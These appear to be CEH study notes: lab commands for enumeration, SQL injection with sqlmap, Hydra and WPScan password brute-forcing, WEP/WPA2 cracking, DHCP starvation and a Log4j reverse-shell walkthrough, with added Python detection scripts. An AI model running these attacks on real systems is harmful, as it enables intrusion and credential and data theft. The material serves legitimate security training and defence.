Reconnaissance and Enumeration
1. Physical Location of Servers
1. https://www.ipvoid.com/
2. BillCipher
Installation and usage: https://www.geeksforgeeks.org/billcipher-an-information-gathering-tool-in-kali-linux/
2. Performing Zone Transfers
2.1. Perform DNS Enumeration using Nmap
In the terminal window, type nmap --script=broadcast-dns-service-discovery [Target Domain] and press Enter (here, the target domain is certifiedhacker.com).
2.2. Attempt a Zone Transfer: Using one of the DNS servers found in the previous step, attempt a zone transfer with the AXFR query:
dig @<dns-server> <target-domain> AXFR
Replace <dns-server> with the IP address or hostname of the DNS server.
Replace <target-domain> with the target domain name.
A correctly configured authoritative server refuses AXFR from anything other than its own secondaries (dig reports "Transfer failed."); a full zone coming back is itself a finding.
2.3. Automate Zone Transfer with dnsrecon
Tools like dnsrecon can automate zone transfer attempts and other DNS enumeration tasks:
dnsrecon -d <target-domain> -t axfr
2.4. Automate Zone Transfer with nmap
Nmap has a DNS zone transfer script (dns-zone-transfer):
nmap --script dns-zone-transfer -p 53 <dns-server>
2.5. Automate Zone Transfer with dig
dig www.certifiedhacker.com axfr
3. Identifying Live Hosts on a Subnet
3.1. nmap -sn -PU <Target IP Address>
✓ UDP response - Host is active
✓ Error messages (host/network unreachable or TTL exceeded) - Host is inactive
✓ Detects systems behind firewalls with strict TCP filtering
3.2. nmap -sn -PR <Target IP Address>
✓ ARP response - Host is active
✓ No response - Host is inactive
✓ More efficient and accurate than other host discovery techniques
✓ Useful for system discovery, where one may need to scan large address spaces
4. LDAP Enumeration (Ties to RPC and SMB Enumeration)
https://www.youtube.com/watch?v=-vjF3kgvWVg
4.1. Perform LDAP enumeration on the target network and find out how many user accounts are associated with the domain.
ldapsearch -x -h 10.10.10.25 -b "DC=CEHORG,DC=com" "objectclass=user" cn
The DC information (the base DN) is obtained from a deep scan of the AD machine.
Or
rpcclient -U "" -N <IP> >> type help when you get to an rpc shell, then type enumdomusers to get all domain users.
4.2. Perform an LDAP Search on the Domain Controller machine and find out the version of the LDAP protocol.
ldapsearch -h 10.10.10.25 -x -s base namingcontexts
4.3. Bruteforce LDAP with known usernames:
hydra -L userlist.txt -P passwords.txt -s 389 -o results.txt ldap3://<LDAP_Server_IP>
or
hydra -L userlist.txt -P passwords.txt ldap3://<LDAP_Server_IP>
5. SMB Enumeration
5.1. Start with SMBMap >> smbmap -H <ip>
5.2. Try a null session login >> smbclient -L <IP> -U ""
5.3. Checking for SMB signing: nmap -A -T4 <IP> (the default script set that -A runs includes smb2-security-mode, which reports whether message signing is enabled and whether it is required)
6. RPC Enumeration
6.1. Use rpcclient >> rpcclient -U "" -N <IP> >> type help when you get to an rpc shell.
Type enumdomusers to get all domain users.
7. DNS Server Enumeration
7.1. Nmap: https://www.youtube.com/watch?v=Qf3QxCoC15s
7.2. Dnsenum >> dnsenum www.certifiedhacker.com
8. Version of Software used by the web server
8.1. Using WhatWeb
whatweb www.site.com
8.2. Using BillCipher
9. Obtaining the Etag of a WebServer
Using curl: curl -s -I <ip of webserver>
10. Identify the Content Management System used
1. Using wig: wig www.cehorg.com
2. Using the Wappalyzer Mozilla add-on
11. Live Crawling of a website to identify images and subtree
1. Using OWASP ZAP
2. Using Burpsuite
12. SQL Injection with SQLMap
sqlmap -u www.site.com (the full URL after login) --cookie="" (cookie obtained via the browser console with the command document.cookie) --batch --dump-all
or
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<Cookie Value>" -D moviescope -T User_Login --dump
13. Perform XSS vulnerability test
1. Using GhostEye
https://www.geeksforgeeks.org/how-to-install-ghost_eye-tool-in-kali-linux/
2. Using PwnXSS
Type cd PwnXSS and press Enter to enter the PwnXSS directory.
To perform a scan on the target website, type python3 pwnxss.py -u http://testphp.vulnweb.com and press Enter.
Note: -u specifies the target URL (here, http://testphp.vulnweb.com). However, you can select a target URL of your choice.
14. Perform wireless attacks
o Crack a WEP network using Aircrack-ng
802.11 protocol indicates wireless packets.
Type aircrack-ng '/home/attacker/Desktop/Sample Captures/WEPcrack-01.cap' and press Enter.
By issuing the above command, aircrack-ng will crack the WEP key.
o Crack a WPA2 network using Aircrack-ng
Type aircrack-ng -a2 -b [Target BSSID] -w /home/attacker/Desktop/Wordlist/password.txt '/home/attacker/Desktop/Sample Captures/WPA2crack-01.cap'
Sniffing
1. DHCP Starvation Attack
Use Yersinia >> sudo yersinia -G
Click on 'Launch Attack'
Choose DHCP
Tick the send DISCOVER packets option and click OK
Monitor with Wireshark
Some examples of DHCP starvation attack tools are listed below:
▪ dhcpStarvation.py (https://github.com)
▪ Hyenae (https://sourceforge.net)
▪ dhcpstarv (https://github.com)
▪ Gobbler (https://sourceforge.net)
▪ DHCPig (https://github.com)
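The detection side of the attack above, as an added example that is not from these notes or from Yersinia: a Python script that counts distinct DHCPDISCOVER client MACs per interface within a short window over ISC dhcpd-style syslog lines. A real client repeats its DISCOVER from one MAC; starvation shows up as many different MACs inside a few seconds. The host name, interface, MAC addresses and timestamps in the sample log are constructed.

```python
"""Detect a DHCP starvation pattern in dhcpd-style syslog lines.

Added example for these notes (not from the page or any tool it lists). It
assumes ISC dhcpd log wording; host, interface and MACs below are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: one legitimate client (00:11:22:33:44:01) plus a burst of
# eight never-seen MACs in three seconds, which is what starvation looks like.
SAMPLE_LOG = """\
Mar  3 09:00:00 dhcp1 dhcpd[812]: DHCPDISCOVER from 00:11:22:33:44:01 via eth0
Mar  3 09:00:00 dhcp1 dhcpd[812]: DHCPOFFER on 10.0.0.10 to 00:11:22:33:44:01 via eth0
Mar  3 09:00:01 dhcp1 dhcpd[812]: DHCPDISCOVER from 0a:00:27:00:00:01 via eth0
Mar  3 09:00:01 dhcp1 dhcpd[812]: DHCPDISCOVER from 0a:00:27:00:00:02 via eth0
Mar  3 09:00:01 dhcp1 dhcpd[812]: DHCPDISCOVER from 0a:00:27:00:00:03 via eth0
Mar  3 09:00:02 dhcp1 dhcpd[812]: DHCPDISCOVER from 0a:00:27:00:00:04 via eth0
Mar  3 09:00:02 dhcp1 dhcpd[812]: DHCPDISCOVER from 0a:00:27:00:00:05 via eth0
Mar  3 09:00:02 dhcp1 dhcpd[812]: DHCPDISCOVER from 0a:00:27:00:00:06 via eth0
Mar  3 09:00:03 dhcp1 dhcpd[812]: DHCPDISCOVER from 0a:00:27:00:00:07 via eth0
Mar  3 09:00:03 dhcp1 dhcpd[812]: DHCPDISCOVER from 0a:00:27:00:00:08 via eth0
Mar  3 09:00:30 dhcp1 dhcpd[812]: DHCPDISCOVER from 00:11:22:33:44:01 via eth0
"""

DISCOVER_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ dhcpd\[\d+\]: "
    r"DHCPDISCOVER from (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2}) via (?P<iface>\S+)",
    re.IGNORECASE,
)

def parse_discovers(log_text):
    """Return (timestamp, mac, iface) for every DHCPDISCOVER line; other
    message types (OFFER, REQUEST, ACK) are ignored."""
    events = []
    for line in log_text.splitlines():
        m = DISCOVER_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
            events.append((ts, m.group("mac").lower(), m.group("iface")))
    return events

def detect_starvation(log_text, window_seconds=10, min_unique_macs=5):
    """Flag each interface that saw at least min_unique_macs distinct DISCOVER
    clients inside any window_seconds-long window. Returns {iface: peak count}."""
    by_iface = defaultdict(list)
    for ts, mac, iface in parse_discovers(log_text):
        by_iface[iface].append((ts, mac))
    alerts = {}
    for iface, events in by_iface.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until it spans at most window_seconds
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            unique = {mac for _, mac in events[start:end + 1]}
            if len(unique) >= min_unique_macs:
                alerts[iface] = max(alerts.get(iface, 0), len(unique))
    return alerts

if __name__ == "__main__":
    print(detect_starvation(SAMPLE_LOG))  # {'eth0': 9}
```

The same counting works on a switch's DHCP snooping log or on Wireshark's `dhcp.option.dhcp == 1` (DISCOVER) output; the second DISCOVER from the legitimate MAC at 09:00:30 is outside the burst window and does not raise the count.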
2. Wireshark Viewing Commands
Vulnerability Scanning
1. OpenVAS
How to start on terminal: sudo gvm-start
https://hassen-hannachi.medium.com/installing-openvas-on-kali-linux-a54baeaf806a
Gaining Access
1. Cracking Hashes
I. John the Ripper >> john --format=NT hashes.txt
2. Password Auditing
1. Using L0phtCrack >> https://www.youtube.com/watch?v=jGFGQ6Nrc40
3. SSH id_rsa Key Passphrase Cracking
https://robertholdsworthsecurity.medium.com/how-to-crack-an-ssh-private-key-passphrase-ab7dd1583178
https://www.hackingarticles.in/ssh-penetration-testing-port-22/
Enumerating SSH authentication methods
Using Nmap >> nmap --script ssh-auth-methods --script-args="ssh.user=pentest" -p 22 192.168.31.205
4. Gain Access by Exploiting Log4j Vulnerability
In the address bar of the browser, type http://<IP>:8080 and press Enter.
Click the MATE Terminal icon at the top of the Desktop to open a Terminal window.
Type cd log4j-shell-poc and press Enter to enter the log4j-shell-poc directory.
Now we need to install JDK 8. To do that, open a new terminal window, type sudo su and press Enter to run the programs as the root user.
We need to extract the JDK archive, which is already placed at the /home/attacker location.
Type tar -xf jdk-8u202-linux-x64.tar.gz and press Enter to extract the file. Note: -xf specifies extracting all files from the archive.
Now we will move jdk1.8.0_202 into /usr/bin/. To do that, type mv jdk1.8.0_202 /usr/bin/ and press Enter.
Now we need to update the installed JDK path in the poc.py file.
Navigate to the previous terminal window (log4j-shell-poc). In the terminal, type pluma poc.py and press Enter to open the poc.py file.
In the poc.py file, scroll down to line 62 and replace jdk1.8.0_20/bin/javac with /usr/bin/jdk1.8.0_202/bin/javac.
Scroll down to line 87 and replace jdk1.8.0_20/bin/java with /usr/bin/jdk1.8.0_202/bin/java.
Scroll down to line 99 and replace jdk1.8.0_20/bin/java with /usr/bin/jdk1.8.0_202/bin/java.
Save all changes.
Now open a new terminal window, type nc -lvp 9001 and press Enter to start a netcat listener.
Switch to the previous terminal window (log4j-shell-poc directory) and type python3 poc.py --userip 10.10.1.13 --webport 8000 --lport 9001 and press Enter to start the exploitation and create the payload.
10.10.1.13 is your IP >> check your IP with ifconfig and pick the eth0 IP.
Now copy the payload generated in the "send me:" section.
Switch to the Firefox browser window, paste the payload copied in the previous step into the Username field, type password in the Password field and press the Login button.
Note: In the Password field you can enter any password.
Now switch to the netcat listener; you can see that a reverse shell has opened.
In the listener window, type pwd and press Enter to view the present working directory.
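For the blue-team side of the Log4j exercise above, an added example that is not from these notes or from the log4j-shell-poc project: a Python scan of HTTP access-log lines for the JNDI lookup marker that the payload carries. Each line is URL-decoded first, because the marker usually arrives percent-encoded in the request line, and a lookup nested inside another lookup is flagged on its own since that is how the plain marker gets hidden from naive string matching. The log format is the common combined format; all addresses, ports and paths are constructed.

```python
"""Flag Log4Shell-style JNDI lookup strings in HTTP access-log lines.

Added detection example for these notes, not part of the page or of the
log4j-shell-poc project. Assumes combined-format access logs; every address,
port and path in the sample is constructed.
"""
import re
from urllib.parse import unquote

# The lookup as the vulnerable logger would expand it: ${jndi:<scheme>://...}
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A lookup nested inside another lookup (${...${...}...}) never occurs in
# legitimate form input, so it is suspicious regardless of what it resolves to.
NESTED_LOOKUP_RE = re.compile(r"\$\{[^}]*\$\{")

SAMPLE_ACCESS_LOG = """\
10.10.1.5 - - [03/Mar/2024:10:00:01 +0000] "POST /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.1.13 - - [03/Mar/2024:10:00:07 +0000] "GET /login?uname=%24%7Bjndi%3Aldap%3A%2F%2F10.10.1.13%3A1389%2Fa%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.1.13 - - [03/Mar/2024:10:00:09 +0000] "GET / HTTP/1.1" 200 88 "-" "${${lower:j}ndi:rmi://10.10.1.13/x}"
10.10.1.7 - - [03/Mar/2024:10:00:11 +0000] "GET /health HTTP/1.1" 200 2 "-" "curl/8.0"
"""

def classify(line):
    """Return 'jndi', 'nested-lookup' or None for one log line.

    The whole line is decoded and scanned, not just the request line, because
    any logged header (User-Agent, X-Forwarded-For, ...) reaches the logger.
    """
    decoded = unquote(line)
    if JNDI_RE.search(decoded):
        return "jndi"
    if NESTED_LOOKUP_RE.search(decoded):
        return "nested-lookup"
    return None

def find_lookup_attempts(log_text):
    """Return [(client_ip, kind)] for every suspicious line, in log order."""
    hits = []
    for line in log_text.splitlines():
        kind = classify(line)
        if kind:
            hits.append((line.split(" ", 1)[0], kind))
    return hits

if __name__ == "__main__":
    for ip, kind in find_lookup_attempts(SAMPLE_ACCESS_LOG):
        print(ip, kind)
```

A hit is only an attempt; pair it with the vulnerable host's outbound connection logs (LDAP/RMI to the address in the lookup) to tell a blocked probe from a successful callback.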
5. Bruteforcing Passwords
1. WPSCAN
Brute-force WordPress Login with WPScan: wpscan --url http://example.com --username <user> --passwords <password_list> --enumerate u
--url: The target WordPress website.
--username <user>: A specific username to attempt brute-forcing.
--passwords <password_list>: A file containing passwords to try.
--enumerate u: Enumerates users (useful if you don't know the usernames and need WPScan to find them).
wpscan --url http://example.com --wordlist /path/to/wordlist.txt --enumerate u
2. Hydra
Syntax for Hydra (for WordPress): hydra -l <username> -P <password_list> <target> http-get-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username"
-l <username>: The username to try.
-P <password_list>: The password list to use.
<target>: The target WordPress website (e.g., example.com).
http-get-form: The protocol and form-based authentication method used by WordPress.
/wp-login.php: The login page URL (commonly /wp-login.php for WordPress).
log=^USER^&pwd=^PASS^: The form field names, where ^USER^ will be replaced with the username and ^PASS^ with the password.
Invalid username: The keyword in the response page when authentication fails. Hydra looks for this text to determine whether the login attempt succeeded.
Using Hydra for Other Services:
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
hydra -l <username> -P <password_list> ftp://<target_ip>
hydra -l <username> -P <password_list> <target_url> http-get >> http-get: This option specifies that Hydra will attempt GET requests for HTTP authentication. (hydra -l admin -P /usr/share/wordlists/rockyou.txt http://example.com/login http-get)
hydra -l <username> -P <password_list> mysql://<target_ip>
hydra -l <username> -P <password_list> rdp://<target_ip>
hydra -l <username> -P <password_list> telnet://<target_ip>
hydra -l <username> -P <password_list> smtp://<target_ip>
hydra -l <username> -P <password_list> imap://<target_ip>
hydra -l user -P /usr/share/wordlists/rockyou.txt pop3://192.168.1.10
Additional Hydra Options
-t <num>: Number of concurrent threads (default is 16). Increase this value to speed up the brute-force attack.
o Example: -t 64 for 64 threads.
-vV: Enables verbose mode (displays progress of each attempt).
-f: Exit on the first successful login.
-s <port>: Specify a custom port if the service is running on a non-default port.
o Example: -s 2222 for SSH running on port 2222.
-w <timeout>: Specifies the timeout value in seconds for each connection attempt.
-I: Ignore any errors related to HTTP 404, 403, etc.
hydra -L /path/to/usernames.txt -P /path/to/passwords.txt -t 16 -vV -f ssh://192.168.1.10
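The defender's view of the Hydra runs above, as an added example that is not from these notes or from Hydra: per-source failed-login counting over sshd auth.log lines in a sliding 60-second window, with a separate flag for a success that follows the burst, which is the case worth paging on. The host name, addresses, ports and timestamps in the sample are constructed.

```python
"""Spot password guessing against sshd in auth.log-style lines.

Added detection example for these notes (not from the page or from Hydra/WPScan).
Assumes OpenSSH's default log wording; host, addresses and ports are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

SAMPLE_AUTH_LOG = """\
Mar  3 11:00:00 web1 sshd[2201]: Failed password for root from 192.168.1.50 port 51234 ssh2
Mar  3 11:00:01 web1 sshd[2202]: Failed password for invalid user admin from 192.168.1.50 port 51235 ssh2
Mar  3 11:00:01 web1 sshd[2203]: Failed password for root from 192.168.1.50 port 51236 ssh2
Mar  3 11:00:02 web1 sshd[2204]: Failed password for root from 192.168.1.50 port 51237 ssh2
Mar  3 11:00:02 web1 sshd[2205]: Failed password for root from 192.168.1.50 port 51238 ssh2
Mar  3 11:00:03 web1 sshd[2206]: Accepted password for root from 192.168.1.50 port 51239 ssh2
Mar  3 11:05:00 web1 sshd[2301]: Failed password for alice from 192.168.1.77 port 40001 ssh2
Mar  3 11:05:20 web1 sshd[2302]: Accepted publickey for alice from 192.168.1.77 port 40002 ssh2
"""

AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) \S+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)

def parse_auth(log_text):
    """Yield (timestamp, source_ip, user, succeeded) per sshd auth line."""
    for line in log_text.splitlines():
        m = AUTH_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
            yield ts, m.group("ip"), m.group("user"), m.group("outcome") == "Accepted"

def detect_bruteforce(log_text, window_seconds=60, threshold=5):
    """Flag sources with >= threshold failures inside window_seconds.

    success_after marks the case that matters most: a login that succeeded from
    the same source once the guessing had already reached the threshold.
    Returns {ip: {"failures": peak_count, "users": [...], "success_after": bool}}.
    """
    by_ip = defaultdict(list)
    for event in parse_auth(log_text):
        by_ip[event[1]].append(event)
    alerts = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e[0])
        failures = [e for e in events if not e[3]]
        start = 0
        for end in range(len(failures)):
            while (failures[end][0] - failures[start][0]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged_at = failures[end][0]
                alert = alerts.setdefault(ip, {"failures": 0, "users": set(), "success_after": False})
                alert["failures"] = max(alert["failures"], count)
                alert["users"].update(e[2] for e in failures[start:end + 1])
                alert["success_after"] |= any(e[3] and e[0] >= flagged_at for e in events)
    return {ip: {**a, "users": sorted(a["users"])} for ip, a in alerts.items()}

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_AUTH_LOG))
```

The single failure from 192.168.1.77 followed by a key-based login is normal user behaviour and stays below the threshold; the burst from 192.168.1.50 is flagged, and the password login that follows it is what turns the alert into an incident.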
6. Website Directory Enumeration
gobuster dir -u http://example.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
Cryptography: Encryption and Steganography
1. Text Steganography
Using Snow.exe >> https://darkside.com.au/snow/
Navigate to E:\CEH-Tools\CEHv12 Module 06 System Hacking\Steganography Tools\Whitespace Steganography Tools, copy the Snow folder, and paste it on the Desktop.
In the Command Prompt window, type cd C:\Users\Admin\Desktop\Snow and press Enter.
Type >>> .\SNOW.EXE -C Confidential.txt
2. Image Steganography
Some examples of image steganography tools are as follows:
▪ StegOnline (https://stegonline.georgeom.net)
▪ Coagula (https://www.abc.se)
▪ QuickStego (http://quickcrypto.com)
▪ SSuite Picsel (https://www.ssuitesoft.com)
▪ CryptaPix (https://www.briggsoft.com)
3. Encryption Algorithms with their Block Size and Key Sizes
Cipher | Block Size | Key Size | Notes
AES (Advanced Encryption Standard) | 128 bits | 128, 192, or 256 bits | Most widely used block cipher today, supports multiple key sizes.
DES (Data Encryption Standard) | 64 bits | 56 bits | Deprecated due to security weaknesses, but historically important.
3DES (Triple DES) | 64 bits | 112 or 168 bits (effectively) | Successor to DES, uses three DES operations for improved security.
Blowfish | 64 bits | 32 to 448 bits | A fast and flexible cipher, often used in secure applications.
Twofish | 128 bits | 128, 192, or 256 bits | Successor to Blowfish, highly secure and flexible.
RC5 (Rivest Cipher 5) | 64 bits | 0 to 2040 bits (variable) | Highly configurable, with block sizes up to 128 bits.
RC6 | 128 bits | 128, 192, or 256 bits | Similar to RC5, used in AES competition but not adopted.
CAST-128 | 64 bits | 40 to 128 bits | A symmetric key block cipher used in SSL and IPsec.
CAST-256 | 128 bits | 128 to 256 bits | Successor to CAST-128, with larger key sizes.
IDEA (International Data Encryption Algorithm) | 64 bits | 128 bits | Block cipher used in PGP and various encryption protocols.
Camellia | 128 bits | 128, 192, or 256 bits | Strong cipher with similar design to AES, used in Japan and other regions.
KASUMI | 64 bits | 128 bits | Block cipher used in 3G mobile communications.
Serpent | 128 bits | 128, 192, or 256 bits | High-security block cipher, designed as an AES alternative.
MISTY1 | 64 bits | 128 bits | Designed for use in financial applications.
SHACAL-2 | 128 bits | 128, 192, or 256 bits | Used in some secure communications protocols.
HIGHT | 64 bits | 128 bits | Lightweight block cipher for hardware environments.
SIMON | 64 bits or 128 bits | 128, 192, or 256 bits | Lightweight cipher used in military and embedded systems.
SPECK | 64 bits or 128 bits | 128, 192, or 256 bits | Designed for use in constrained environments (e.g., IoT).
4. Cryptanalysis tools
1. CrypTool
5. Integrity Checking
MD5 Hash calc
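An added example for the integrity check above (not from these notes or from any hash calculator): chunked hashing with Python's hashlib and a constant-time comparison against a published digest list. MD5 still catches accidental corruption, but an attacker can craft two files with the same MD5, so the manifest carries SHA-256 alongside it and both must match. The sample bytes and their digests are the standard "abc" test vectors, not a real download.

```python
"""Verify a downloaded file against published MD5 and SHA-256 digests.

Added example for these notes; not from the page. The data and manifest below
are constructed (the well-known "abc" test vectors stand in for a download).
"""
import hashlib
import hmac
import io

SAMPLE_DATA = b"abc"
PUBLISHED_MANIFEST = {  # what the publisher lists next to the download (constructed)
    "md5": "900150983cd24fb0d6963f7d28e17f72",
    "sha256": "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad",
}

def compute_digests(source, algorithms=("md5", "sha256"), chunk_size=65536):
    """Hash a file-like object (or bytes) in chunks so large files are not
    read into memory; returns {algorithm: lowercase hex digest}."""
    stream = io.BytesIO(source) if isinstance(source, (bytes, bytearray)) else source
    hashers = {name: hashlib.new(name) for name in algorithms}
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        for h in hashers.values():
            h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}

def verify_manifest(source, manifest):
    """Compare every digest in manifest against the data.

    Returns (all_ok, {algorithm: ok}). compare_digest avoids leaking, through
    timing, how many leading characters of a guessed digest were right, and the
    per-algorithm map shows which entry disagreed when something fails.
    """
    actual = compute_digests(source, algorithms=tuple(manifest))
    results = {
        alg: hmac.compare_digest(actual[alg], expected.strip().lower())
        for alg, expected in manifest.items()
    }
    return all(results.values()), results

if __name__ == "__main__":
    ok, detail = verify_manifest(SAMPLE_DATA, PUBLISHED_MANIFEST)
    print("intact" if ok else "MISMATCH", detail)
```

To check a real file, pass an open handle: `verify_manifest(open(path, "rb"), manifest)`. A manifest fetched over the same channel as the file proves nothing if that channel was tampered with; the digests need to come from a separately trusted source (or a signature over them).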
Malware Threat Analysis
1. String Searching
Static Analysis
Search for strings (File Pos, Mem Pos, ID and Text) using BinText.
2. Disassembling and Debugging Tools
Ghidra >> Create New Project >> Import file for analysis
3. Registry Monitoring
Dynamic Analysis
Navigate to E:\CEH-Tools\CEHv12 Module 07 Malware Threats\Malware Analysis Tools\Dynamic Malware Analysis Tools\Registry Monitoring Tools\Reg Organizer and double-click reg-organizer-setup.exe.
Now click TOOLS from the menu bar and select the Registry Snapshots option from the context menu.
The Registry Snapshots Comparison window appears; click the Create Snapshot option.
Enter a name in the snapshot name field and click OK.
4. Service Monitoring
Dynamic Analysis
Windows Service Manager.exe
5. APK Analysis
https://sisik.eu/apk-tool
Cyber Security Notes
https://github.com/3ls3if/Cybersecurity-Notes/blob/main/readme/ceh-engage-walkthrough/
Wireshark Filters
1. IP Address Filters
Source IP Address:
ip.src == 192.168.1.1
o Filters packets with a source IP of 192.168.1.1.
Destination IP Address:
ip.dst == 192.168.1.100
o Filters packets with a destination IP of 192.168.1.100.
IP Address Range:
ip.src >= 192.168.1.1 && ip.src <= 192.168.1.255
o Filters packets from a specific IP address range.
Subnet Filtering:
ip.src == 192.168.1.0/24
o Filters packets coming from the 192.168.1.0/24 subnet.
2. Protocol Filters
TCP Traffic:
tcp
o Filters all TCP traffic.
UDP Traffic:
udp
o Filters all UDP traffic.
HTTP Traffic:
http
o Filters HTTP packets.
DNS Traffic:
dns
o Filters DNS traffic.
ICMP Traffic:
icmp
o Filters ICMP packets (e.g., ping requests).
ARP Traffic:
arp
o Filters ARP packets.
SSL/TLS Traffic:
ssl
o Filters SSL/TLS encrypted traffic.
3. Port Filters
Traffic on a Specific Port:
tcp.port == 80
o Filters TCP traffic on port 80 (HTTP), matching either the source or the destination port.
Traffic on Another Specific Port:
tcp.port == 443
o Filters TCP traffic on port 443 (HTTPS).
Traffic on a Range of Ports:
tcp.port >= 1024 && tcp.port <= 2048
o Filters TCP traffic on ports within a specific range.
Exclude a Port:
!(tcp.port == 80)
o Excludes traffic on port 80.
4. TCP Flags Filters
SYN Flag:
tcp.flags.syn == 1
o Filters TCP packets with the SYN flag set (used in connection initiation).
ACK Flag:
tcp.flags.ack == 1
o Filters TCP packets with the ACK flag set.
FIN Flag:
tcp.flags.fin == 1
o Filters TCP packets with the FIN flag set (used to close a connection).
RST Flag:
tcp.flags.rst == 1
o Filters TCP packets with the RST flag set (used to reset a connection).
5. HTTP Filters
HTTP Request Method (GET):
http.request.method == "GET"
o Filters HTTP GET requests.
HTTP Request Method (POST):
http.request.method == "POST"
o Filters HTTP POST requests.
HTTP Host Header:
http.host == "example.com"
o Filters HTTP traffic with a specific Host header.
HTTP URI:
http.request.uri contains "login"
o Filters HTTP requests containing the keyword "login" in the URI.
6. DNS Filters
DNS Query:
dns.flags.response == 0
o Filters DNS query packets.
DNS Response:
dns.flags.response == 1
o Filters DNS response packets.
DNS Query for Specific Domain:
dns.qry.name == "example.com"
o Filters DNS queries for a specific domain.
7. Ethernet Filters
Source MAC Address:
eth.src == 00:11:22:33:44:55
o Filters packets with a specific source MAC address.
Destination MAC Address:
eth.dst == 00:11:22:33:44:55
o Filters packets with a specific destination MAC address.
8. TCP Stream Filters
TCP Stream ID:
tcp.stream eq 1
o Filters packets from a specific TCP stream (e.g., stream ID 1).
9. Filtering by Packet Size
Packet Larger Than a Specific Size:
frame.len >= 1000
o Filters packets of 1000 bytes or larger.
Packet Smaller Than a Specific Size:
frame.len <= 64
o Filters packets of 64 bytes or smaller.
10. Specific Packet Analysis
TCP Retransmissions:
tcp.analysis.retransmission
o Filters TCP retransmitted packets.
Duplicate Acknowledgments:
tcp.analysis.duplicate_ack
o Filters TCP packets with duplicate ACKs.
Round Trip Time (RTT):
tcp.analysis.ack_rtt
o Filters packets based on TCP Round Trip Time (RTT).
11. IP Version Filtering
IPv4 Traffic:
ip.version == 4
o Filters IPv4 packets.
IPv6 Traffic:
ip.version == 6
o Filters IPv6 packets.
12. Error and Bad Packets
Packet Errors:
eth.err
o Filters packets with Ethernet errors (e.g., bad checksums).
13. Custom Filters (Combining Multiple Conditions)
Source IP and Port:
ip.src == 192.168.1.1 && tcp.port == 80
o Filters packets from a specific source IP and on a specific port.
Exclude a Protocol:
not dns
o Excludes DNS packets.
Combine Multiple Filters (AND/OR):
ip.src == 192.168.1.1 && tcp.port == 443 || udp.port == 53
o Combines multiple conditions to filter on source IP, ports, and protocols; && binds tighter than ||, so this reads as (ip.src == 192.168.1.1 && tcp.port == 443) || udp.port == 53.
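To make the operators above concrete, an added example that is not from these notes or from Wireshark: a small Python evaluator for the subset of display-filter syntax used here, run over four constructed packet records. It shows that tcp.port matches either endpoint, that a bare IP literal and a /24 prefix are both handled as ranges, and that && binds tighter than ||, so the last filter above selects the DNS packet and the 443 packet but not the SYN to port 80.

```python
"""Evaluate a subset of Wireshark display-filter syntax over constructed packet
records. Added example for these notes, not Wireshark code; it supports only the
operators the filters above use."""
import ipaddress
import operator
import re

PACKETS = [  # constructed packets, reduced to the fields the filters above reference
    {"no": 1, "ip.src": "192.168.1.1", "ip.dst": "10.0.0.5",
     "tcp.srcport": 51000, "tcp.dstport": 80, "tcp.flags.syn": 1, "frame.len": 74},
    {"no": 2, "ip.src": "192.168.1.20", "ip.dst": "8.8.8.8", "udp.srcport": 53000,
     "udp.dstport": 53, "dns.qry.name": "example.com", "dns.flags.response": 0, "frame.len": 82},
    {"no": 3, "ip.src": "172.16.0.9", "ip.dst": "192.168.1.1",
     "tcp.srcport": 443, "tcp.dstport": 52000, "tcp.flags.syn": 0, "frame.len": 1500},
    {"no": 4, "ip.src": "192.168.1.1", "ip.dst": "172.16.0.9", "tcp.srcport": 52000,
     "tcp.dstport": 443, "tcp.flags.syn": 0, "tcp.analysis.retransmission": 1, "frame.len": 60},
]

TOKEN_RE = re.compile(r'\s*(&&|\|\||==|!=|>=|<=|>|<|!|\(|\)|"[^"]*"|[^\s()!&|=<>"]+)')
WORD_OPS = {"and": "&&", "or": "||", "not": "!", "eq": "=="}  # keyword spellings
OPS = {"==": operator.eq, "!=": operator.ne, ">=": operator.ge, "<=": operator.le,
       ">": operator.gt, "<": operator.lt, "contains": lambda a, b: str(b) in str(a)}
# Fields that stand for either endpoint: tcp.port == 80 matches source or destination port.
EITHER = {"tcp.port": ("tcp.srcport", "tcp.dstport"), "udp.port": ("udp.srcport", "udp.dstport")}

def field_values(pkt, field):
    return [pkt[k] for k in EITHER.get(field, (field,)) if k in pkt]

def coerce(field, raw):
    """Give the literal the field's type; an IP literal becomes a network (/32 for a host)."""
    raw = raw.strip('"')
    if field in ("ip.src", "ip.dst"):
        return ipaddress.ip_network(raw, strict=False)
    return int(raw) if raw.isdigit() else raw

def compare(pkt, field, op, raw):
    wanted = coerce(field, raw)
    for actual in field_values(pkt, field):  # no such field -> False, as in Wireshark
        if isinstance(wanted, (ipaddress.IPv4Network, ipaddress.IPv6Network)):
            addr = ipaddress.ip_address(actual)  # ==/!= test membership, others use the nearest edge
            edge = wanted.network_address if op in (">=", "<") else wanted.broadcast_address
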